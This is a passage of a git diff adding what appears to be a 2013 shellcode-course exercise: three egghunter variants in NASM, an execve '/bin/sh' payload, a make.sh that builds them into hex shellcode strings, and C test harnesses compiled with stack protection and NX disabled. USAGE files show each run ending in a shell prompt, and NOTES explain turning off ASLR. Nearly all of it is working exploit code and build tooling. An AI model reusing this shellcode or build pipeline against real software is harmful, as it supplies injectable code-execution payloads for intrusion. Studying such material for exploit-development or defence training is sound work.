+#echo ${NEWEGG[0]}
+#echo ${NEWEGG[1]}
+
+# Preparing Default egg to HEX form in order to replace it with a New egg
+DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+
+# Uncomment to save new EGGMARK in HEX format
+NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+
+# Uncomment to save new EGGMARK in Plaintext format
+#NEWEGG1=$(echo -n ${NEWEGG[0]})
+#NEWEGG2=$(echo -n ${NEWEGG[1]})
+
+
+FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g')
+
+echo " [+] Checking HUNTER code for NULLs ..."
+if [[ $FULL_HUNTERCODE == *00* ]]; then
+ echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting."
+ exit 1
+fi
+
+
+# Uncomment to see what will is replaced (default egg with a new one)
+#echo $DEFEGG1
+#echo $DEFEGG2
+#echo $NEWEGG1
+#echo $NEWEGG2
+#echo $HUNTERCODE
+#echo $FULL_HUNTERCODE
+
+cat > shellcode.c << EOF
+#include
+#include
+
+unsigned char hunter[] = \
+$FULL_HUNTERCODE;
+
+unsigned char garbage1[] = \
+"Just some garbage here...";
+
+unsigned char payload[] = \
+$FULL_PAYLOADCODE;
+
+unsigned char garbage2[] = \
+"And some garbage there...";
+
+main()
+{
+ printf("Hunter Length: %d\n", strlen(hunter));
+ printf("Payload Length: %d\n", strlen(payload));
+ int (*ret)() = (int(*)())hunter;
+ ret();
+}
+EOF
+
+echo " [+] Compiling shellcode.c ..."
+gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
+
+# Cleanup
+rm -f payload.o payload hunter.o hunter
+
+ls -la ./shellcode
+
+echo " [+] All done!"
diff --git a/exam3/access-scasd/payload.nasm b/exam3/access-scasd/payload.nasm
new file mode 100644
index 0000000..1ab23b8
--- /dev/null
+++ b/exam3/access-scasd/payload.nasm
@@ -0,0 +1,44 @@
+; This program is free software: you can redistribute it and/or modify
+; it under the terms of the GNU General Public License as published by
+; the Free Software Foundation, either version 3 of the License, or
+; (at your option) any later version.
+;
+; This program is distributed in the hope that it will be useful,
+; but WITHOUT ANY WARRANTY; without even the implied warranty of
+; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+; GNU General Public License for more details.
+;
+; You should have received a copy of the GNU General Public License
+; along with this program. If not, see .
+
+; Filename: payload-execve-stack.nasm
+; Author: Andrey Arapov
+; 2013 March
+
+global _start
+
+
+section .text
+
+_start:
+ ; EAX
+ xor eax, eax
+ mov al, 11 ; execve syscall
+
+ ; EBX
+ xor edx, edx
+ push edx ; NULL termination of '//bin/sh' string
+ push 0x68732f6e ; '//bin/sh' in reverse
+ push 0x69622f2f ; beginning of '//bin/sh' string is here
+ mov ebx, esp ; put the address of '//bin/sh' into ebx via esp
+
+ ; ECX
+ push edx ; NULL termination of a stack
+ push ebx ; load our '//bin/sh' on a stack
+ mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.
+
+ ; EDX
+ push edx ; NULL terminator
+ mov edx, esp ; EDX is a PTR to a stack which has an address to NULL.
+ int 0x80
+
diff --git a/exam3/access-scasd/shellcode.c b/exam3/access-scasd/shellcode.c
new file mode 100644
index 0000000..e0102bc
--- /dev/null
+++ b/exam3/access-scasd/shellcode.c
@@ -0,0 +1,18 @@
+#include
+#include
+
+unsigned char hunter[] = "\xfc\x31\xd2\x66\x81\xca\xff\x0f\x42\x6a\x21\x58\x8d\x5a\x04\x31\xc9\xcd\x80\x3c\xf2\x74\xec\xb8\x48\x65\x72\x65\x89\xd7\xaf\x75\xe7\xb8\x49\x74\x49\x73\x8d\x7a\x04\xaf\x75\xdc\xff\xe7";
+
+unsigned char garbage1[] = "Just some garbage here...";
+
+unsigned char payload[] = "\x48\x65\x72\x65\x49\x74\x49\x73\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
+
+unsigned char garbage2[] = "And some garbage there...";
+
+main()
+{
+ printf("Hunter Length: %d\n", strlen(hunter));
+ printf("Payload Length: %d\n", strlen(payload));
+ int (*ret)() = (int(*)())hunter;
+ ret();
+}
diff --git a/exam3/access/NOTES b/exam3/access/NOTES
new file mode 100644
index 0000000..088dd00
--- /dev/null
+++ b/exam3/access/NOTES
@@ -0,0 +1,11 @@
+NOTES
+
+ no-stack-protector: disables GCC Stack-Smashing Protector (SSP), aka ProPolice
+
+ execstack: disables Executable space protection (NX).
+ Or Data Execution Prevention (DEP) on Windows,
+ or Write XOR Execute (W^X) on BSD.
+ CPU’s NX bit ("Never eXecute").
+
+ To disalbe Address Space Layout Randomization (ASLR) when running binary
+ setarch `arch` -R ./program
diff --git a/exam3/access/USAGE b/exam3/access/USAGE
new file mode 100644
index 0000000..5fb491d
--- /dev/null
+++ b/exam3/access/USAGE
@@ -0,0 +1,27 @@
+USAGE
+
+1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable)
+
+
+2. Compile the shellcode with a custom "egg" (must be 8 bytes in length)
+
+access$ ./make.sh "MyEgg123"
+ [I] Using custom EGG mark: MyEgg123
+ [+] Compiling payload.nasm ...
+ [+] Compiling hunter.nasm ...
+ [+] Extracting PAYLOAD code from payload ...
+ [+] Adding EGG mark to PAYLOAD ...
+ [+] Checking PAYLOAD code for NULLs ...
+ [+] Extracting HUNTER code from hunter ...
+ [+] Checking HUNTER code for NULLs ...
+ [+] Compiling shellcode.c ...
+-rwx------. 1 arno arno 5132 Mar 28 00:22 ./shellcode
+ [+] All done!
+
+
+3. Run the shellcode
+
+access$ ./shellcode
+Hunter Length: 44
+Payload Length: 36
+sh-4.1$
diff --git a/exam3/access/hunter.nasm b/exam3/access/hunter.nasm
new file mode 100644
index 0000000..cd9c50d
--- /dev/null
+++ b/exam3/access/hunter.nasm
@@ -0,0 +1,59 @@
+; This program is free software: you can redistribute it and/or modify
+; it under the terms of the GNU General Public License as published by
+; the Free Software Foundation, either version 3 of the License, or
+; (at your option) any later version.
+;
+; This program is distributed in the hope that it will be useful,
+; but WITHOUT ANY WARRANTY; without even the implied warranty of
+; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+; GNU General Public License for more details.
+;
+; You should have received a copy of the GNU General Public License
+; along with this program. If not, see .
+;
+;
+; Filename: hunter.nasm *access modification
+; Author: Andrey Arapov
+; 2013 March
+;
+;
+
+section .data
+ egg1 equ "Egg-" ; DWORD Egg marker part1
+ egg2 equ "Mark" ; DWORD Egg marker part2
+
+
+section .text
+global _start
+
+
+_start:
+ xor edx, edx ; Searching the whole memory
+
+
+ ; We will scan memory page-by-page and only accessible pages will be scanned for the Egg marker
+nextPage:
+ or dx, 0xfff ; The same as "add dx, 4095" (PAGE_SIZE)
+
+nextAddr:
+ inc edx ; Searching forward
+
+ ; Checking if memory is accessible
+ push byte +0x21 ; 0x21 = 33 = __NR_access
+ pop eax ; EAX points to 0x21
+ lea ebx, [edx+0x8] ; next address to check
+ xor ecx, ecx ; 0: mode = F_OK
+ int 0x80
+ cmp al, -14 ; -14 = EFAULT = Bad address. See /usr/include/asm-generic/errno-base.h
+ jz nextPage
+
+
+ ; Searching for the Egg marker (in current page of memory which is accessible)
+ cmp dword [edx], egg1
+ jne nextAddr
+ cmp dword [edx+0x4], egg2
+ jne nextAddr
+
+ lea ecx, [edx+0x8]
+ jmp ecx
+
diff --git a/exam3/access/make.sh b/exam3/access/make.sh
new file mode 100755
index 0000000..00c5f73
--- /dev/null
+++ b/exam3/access/make.sh
@@ -0,0 +1,130 @@
+#!/usr/bin/env sh
+#
+# USAGE
+# ./make.sh [Egg-Mark]
+#
+# NOTE
+# Egg-Mark must be a plaintext with 8 bytes in length
+# If Egg-Mark was not specified, the default one will be used.
+#
+# To specify a custom payload, simply modify the code of payload.nasm file.
+# Alternativly, you can modify PAYLOADCODE= variable down below the code.
+#
+
+ARG1=$1
+
+if [ -z "$ARG1" ]; then
+ echo " [I] Argument not specified. Using default EGG mark."
+ ARG1="Egg-Mark";
+elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then
+ echo " [E] Custom EGG mark must be 8 bytes in length! Exiting."
+ exit 1;
+else
+ echo " [I] Using custom EGG mark: "$ARG1
+fi
+
+
+DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g')) # set in hunter.nasm
+EGGMARK=$ARG1
+NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g'))
+
+# Uncomment to save EGGMARK in HEX
+EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g')
+
+# Cleanup
+rm -f shellcode payload.o payload hunter.o hunter
+
+echo " [+] Compiling payload.nasm ..."
+nasm -f elf32 -o payload.o payload.nasm
+ld -m elf_i386 -o payload payload.o
+
+echo " [+] Compiling hunter.nasm ..."
+nasm -f elf32 -o hunter.o hunter.nasm
+ld -m elf_i386 -o hunter hunter.o
+
+echo " [+] Extracting PAYLOAD code from payload ..."
+PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s)
+
+echo " [+] Adding EGG mark to PAYLOAD ..."
+FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g')
+
+echo " [+] Checking PAYLOAD code for NULLs ..."
+if [[ $FULL_PAYLOADCODE == *00* ]]; then
+ echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting."
+ exit 1
+fi
+
+
+echo " [+] Extracting HUNTER code from hunter ..."
+HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g')
+
+# For debugging only
+#echo ${DEFAULTEGG[0]}
+#echo ${DEFAULTEGG[1]}
+#echo ${NEWEGG[0]}
+#echo ${NEWEGG[1]}
+
+# Preparing Default egg to HEX form in order to replace it with a New egg
+DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+
+# Uncomment to save new EGGMARK in HEX format
+NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+
+# Uncomment to save new EGGMARK in Plaintext format
+#NEWEGG1=$(echo -n ${NEWEGG[0]})
+#NEWEGG2=$(echo -n ${NEWEGG[1]})
+
+
+FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g')
+
+echo " [+] Checking HUNTER code for NULLs ..."
+if [[ $FULL_HUNTERCODE == *00* ]]; then
+ echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting."
+ exit 1
+fi
+
+
+# Uncomment to see what will is replaced (default egg with a new one)
+#echo $DEFEGG1
+#echo $DEFEGG2
+#echo $NEWEGG1
+#echo $NEWEGG2
+#echo $HUNTERCODE
+#echo $FULL_HUNTERCODE
+
+cat > shellcode.c << EOF
+#include
+#include
+
+unsigned char hunter[] = \
+$FULL_HUNTERCODE;
+
+unsigned char garbage1[] = \
+"Just some garbage here...";
+
+unsigned char payload[] = \
+$FULL_PAYLOADCODE;
+
+unsigned char garbage2[] = \
+"And some garbage there...";
+
+main()
+{
+ printf("Hunter Length: %d\n", strlen(hunter));
+ printf("Payload Length: %d\n", strlen(payload));
+ int (*ret)() = (int(*)())hunter;
+ ret();
+}
+EOF
+
+echo " [+] Compiling shellcode.c ..."
+gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
+
+# Cleanup
+rm -f payload.o payload hunter.o hunter
+
+ls -la ./shellcode
+
+echo " [+] All done!"
diff --git a/exam3/access/payload.nasm b/exam3/access/payload.nasm
new file mode 100644
index 0000000..1ab23b8
--- /dev/null
+++ b/exam3/access/payload.nasm
@@ -0,0 +1,44 @@
+; This program is free software: you can redistribute it and/or modify
+; it under the terms of the GNU General Public License as published by
+; the Free Software Foundation, either version 3 of the License, or
+; (at your option) any later version.
+;
+; This program is distributed in the hope that it will be useful,
+; but WITHOUT ANY WARRANTY; without even the implied warranty of
+; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+; GNU General Public License for more details.
+;
+; You should have received a copy of the GNU General Public License
+; along with this program. If not, see .
+
+; Filename: payload-execve-stack.nasm
+; Author: Andrey Arapov
+; 2013 March
+
+global _start
+
+
+section .text
+
+_start:
+ ; EAX
+ xor eax, eax
+ mov al, 11 ; execve syscall
+
+ ; EBX
+ xor edx, edx
+ push edx ; NULL termination of '//bin/sh' string
+ push 0x68732f6e ; '//bin/sh' in reverse
+ push 0x69622f2f ; beginning of '//bin/sh' string is here
+ mov ebx, esp ; put the address of '//bin/sh' into ebx via esp
+
+ ; ECX
+ push edx ; NULL termination of a stack
+ push ebx ; load our '//bin/sh' on a stack
+ mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.
+
+ ; EDX
+ push edx ; NULL terminator
+ mov edx, esp ; EDX is a PTR to a stack which has an address to NULL.
+ int 0x80
+
diff --git a/exam3/access/shellcode.c b/exam3/access/shellcode.c
new file mode 100644
index 0000000..de0a7a1
--- /dev/null
+++ b/exam3/access/shellcode.c
@@ -0,0 +1,18 @@
+#include
+#include
+
+unsigned char hunter[] = "\x31\xd2\x66\x81\xca\xff\x0f\x42\x6a\x21\x58\x8d\x5a\x08\x31\xc9\xcd\x80\x3c\xf2\x74\xec\x81\x3a\x48\x65\x72\x65\x75\xe9\x81\x7a\x04\x49\x74\x49\x73\x75\xe0\x8d\x4a\x08\xff\xe1";
+
+unsigned char garbage1[] = "Just some garbage here...";
+
+unsigned char payload[] = "\x48\x65\x72\x65\x49\x74\x49\x73\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
+
+unsigned char garbage2[] = "And some garbage there...";
+
+main()
+{
+ printf("Hunter Length: %d\n", strlen(hunter));
+ printf("Payload Length: %d\n", strlen(payload));
+ int (*ret)() = (int(*)())hunter;
+ ret();
+}
diff --git a/exam3/basic/NOTES b/exam3/basic/NOTES
new file mode 100644
index 0000000..088dd00
--- /dev/null
+++ b/exam3/basic/NOTES
@@ -0,0 +1,11 @@
+NOTES
+
+ no-stack-protector: disables GCC Stack-Smashing Protector (SSP), aka ProPolice
+
+ execstack: disables Executable space protection (NX).
+ Or Data Execution Prevention (DEP) on Windows,
+ or Write XOR Execute (W^X) on BSD.
+ CPU’s NX bit ("Never eXecute").
+
+ To disalbe Address Space Layout Randomization (ASLR) when running binary
+ setarch `arch` -R ./program
diff --git a/exam3/basic/USAGE b/exam3/basic/USAGE
new file mode 100644
index 0000000..f70903e
--- /dev/null
+++ b/exam3/basic/USAGE
@@ -0,0 +1,27 @@
+USAGE
+
+1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable)
+
+
+2. Compile the shellcode with a custom "egg" (must be 8 bytes in length)
+
+basic$ ./make.sh "egg.MaRk"
+ [I] Using custom EGG mark: egg.MaRk
+ [+] Compiling payload.nasm ...
+ [+] Compiling hunter.nasm ...
+ [+] Extracting PAYLOAD code from payload ...
+ [+] Adding EGG mark to PAYLOAD ...
+ [+] Checking PAYLOAD code for NULLs ...
+ [+] Extracting HUNTER code from hunter ...
+ [+] Checking HUNTER code for NULLs ...
+ [+] Compiling shellcode.c ...
+-rwx------. 1 arno arno 5100 Mar 28 13:17 ./shellcode
+ [+] All done!
+
+
+3. Run the shellcode
+
+basic$ ./shellcode
+Hunter Length: 21
+Payload Length: 36
+sh-4.1$ exit
diff --git a/exam3/basic/hunter.nasm b/exam3/basic/hunter.nasm
new file mode 100644
index 0000000..da46f05
--- /dev/null
+++ b/exam3/basic/hunter.nasm
@@ -0,0 +1,40 @@
+; This program is free software: you can redistribute it and/or modify
+; it under the terms of the GNU General Public License as published by
+; the Free Software Foundation, either version 3 of the License, or
+; (at your option) any later version.
+;
+; This program is distributed in the hope that it will be useful,
+; but WITHOUT ANY WARRANTY; without even the implied warranty of
+; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+; GNU General Public License for more details.
+;
+; You should have received a copy of the GNU General Public License
+; along with this program. If not, see .
+;
+;
+; Filename: hunter.nasm
+; Author: Andrey Arapov
+; 2013 March
+;
+;
+
+section .data
+ egg1 equ "Egg-" ; DWORD Egg marker part1
+ egg2 equ "Mark" ; DWORD Egg marker part2
+
+
+section .text
+global _start
+
+
+_start:
+ ; Searching for the Egg marker
+next:
+ inc eax ; Searching forward (can also try dec eax)
+isEgg:
+ cmp dword [eax-8], egg1 ; Checking if we can see egg1
+ jne next ; If not, continuing to search
+ cmp dword [eax-4], egg2
+ jne next
+
+ call eax ; Once found, we call our payload
diff --git a/exam3/basic/make.sh b/exam3/basic/make.sh
new file mode 100755
index 0000000..00c5f73
--- /dev/null
+++ b/exam3/basic/make.sh
@@ -0,0 +1,130 @@
+#!/usr/bin/env sh
+#
+# USAGE
+# ./make.sh [Egg-Mark]
+#
+# NOTE
+# Egg-Mark must be a plaintext with 8 bytes in length
+# If Egg-Mark was not specified, the default one will be used.
+#
+# To specify a custom payload, simply modify the code of payload.nasm file.
+# Alternativly, you can modify PAYLOADCODE= variable down below the code.
+#
+
+ARG1=$1
+
+if [ -z "$ARG1" ]; then
+ echo " [I] Argument not specified. Using default EGG mark."
+ ARG1="Egg-Mark";
+elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then
+ echo " [E] Custom EGG mark must be 8 bytes in length! Exiting."
+ exit 1;
+else
+ echo " [I] Using custom EGG mark: "$ARG1
+fi
+
+
+DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g')) # set in hunter.nasm
+EGGMARK=$ARG1
+NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g'))
+
+# Uncomment to save EGGMARK in HEX
+EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g')
+
+# Cleanup
+rm -f shellcode payload.o payload hunter.o hunter
+
+echo " [+] Compiling payload.nasm ..."
+nasm -f elf32 -o payload.o payload.nasm
+ld -m elf_i386 -o payload payload.o
+
+echo " [+] Compiling hunter.nasm ..."
+nasm -f elf32 -o hunter.o hunter.nasm
+ld -m elf_i386 -o hunter hunter.o
+
+echo " [+] Extracting PAYLOAD code from payload ..."
+PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s)
+
+echo " [+] Adding EGG mark to PAYLOAD ..."
+FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g')
+
+echo " [+] Checking PAYLOAD code for NULLs ..."
+if [[ $FULL_PAYLOADCODE == *00* ]]; then
+ echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting."
+ exit 1
+fi
+
+
+echo " [+] Extracting HUNTER code from hunter ..."
+HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g')
+
+# For debugging only
+#echo ${DEFAULTEGG[0]}
+#echo ${DEFAULTEGG[1]}
+#echo ${NEWEGG[0]}
+#echo ${NEWEGG[1]}
+
+# Preparing Default egg to HEX form in order to replace it with a New egg
+DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+
+# Uncomment to save new EGGMARK in HEX format
+NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+
+# Uncomment to save new EGGMARK in Plaintext format
+#NEWEGG1=$(echo -n ${NEWEGG[0]})
+#NEWEGG2=$(echo -n ${NEWEGG[1]})
+
+
+FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g')
+
+echo " [+] Checking HUNTER code for NULLs ..."
+if [[ $FULL_HUNTERCODE == *00* ]]; then
+ echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting."
+ exit 1
+fi
+
+
+# Uncomment to see what will is replaced (default egg with a new one)
+#echo $DEFEGG1
+#echo $DEFEGG2
+#echo $NEWEGG1
+#echo $NEWEGG2
+#echo $HUNTERCODE
+#echo $FULL_HUNTERCODE
+
+cat > shellcode.c << EOF
+#include
+#include
+
+unsigned char hunter[] = \
+$FULL_HUNTERCODE;
+
+unsigned char garbage1[] = \
+"Just some garbage here...";
+
+unsigned char payload[] = \
+$FULL_PAYLOADCODE;
+
+unsigned char garbage2[] = \
+"And some garbage there...";
+
+main()
+{
+ printf("Hunter Length: %d\n", strlen(hunter));
+ printf("Payload Length: %d\n", strlen(payload));
+ int (*ret)() = (int(*)())hunter;
+ ret();
+}
+EOF
+
+echo " [+] Compiling shellcode.c ..."
+gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
+
+# Cleanup
+rm -f payload.o payload hunter.o hunter
+
+ls -la ./shellcode
+
+echo " [+] All done!"
diff --git a/exam3/basic/payload.nasm b/exam3/basic/payload.nasm
new file mode 100644
index 0000000..1ab23b8
--- /dev/null
+++ b/exam3/basic/payload.nasm
@@ -0,0 +1,44 @@
+; This program is free software: you can redistribute it and/or modify
+; it under the terms of the GNU General Public License as published by
+; the Free Software Foundation, either version 3 of the License, or
+; (at your option) any later version.
+;
+; This program is distributed in the hope that it will be useful,
+; but WITHOUT ANY WARRANTY; without even the implied warranty of
+; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+; GNU General Public License for more details.
+;
+; You should have received a copy of the GNU General Public License
+; along with this program. If not, see .
+
+; Filename: payload-execve-stack.nasm
+; Author: Andrey Arapov
+; 2013 March
+
+global _start
+
+
+section .text
+
+_start:
+ ; EAX
+ xor eax, eax
+ mov al, 11 ; execve syscall
+
+ ; EBX
+ xor edx, edx
+ push edx ; NULL termination of '//bin/sh' string
+ push 0x68732f6e ; '//bin/sh' in reverse
+ push 0x69622f2f ; beginning of '//bin/sh' string is here
+ mov ebx, esp ; put the address of '//bin/sh' into ebx via esp
+
+ ; ECX
+ push edx ; NULL termination of a stack
+ push ebx ; load our '//bin/sh' on a stack
+ mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.
+
+ ; EDX
+ push edx ; NULL terminator
+ mov edx, esp ; EDX is a PTR to a stack which has an address to NULL.
+ int 0x80
+
diff --git a/exam3/basic/shellcode b/exam3/basic/shellcode
new file mode 100755
index 0000000..bb8215c
Binary files /dev/null and b/exam3/basic/shellcode differ
diff --git a/exam3/basic/shellcode.c b/exam3/basic/shellcode.c
new file mode 100644
index 0000000..feaf2d7
--- /dev/null
+++ b/exam3/basic/shellcode.c
@@ -0,0 +1,18 @@
+#include
+#include
+
+unsigned char hunter[] = "\x40\x81\x78\xf8\x65\x67\x67\x2e\x75\xf6\x81\x78\xfc\x4d\x61\x52\x6b\x75\xed\xff\xd0";
+
+unsigned char garbage1[] = "Just some garbage here...";
+
+unsigned char payload[] = "\x65\x67\x67\x2e\x4d\x61\x52\x6b\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
+
+unsigned char garbage2[] = "And some garbage there...";
+
+main()
+{
+ printf("Hunter Length: %d\n", strlen(hunter));
+ printf("Payload Length: %d\n", strlen(payload));
+ int (*ret)() = (int(*)())hunter;
+ ret();
+}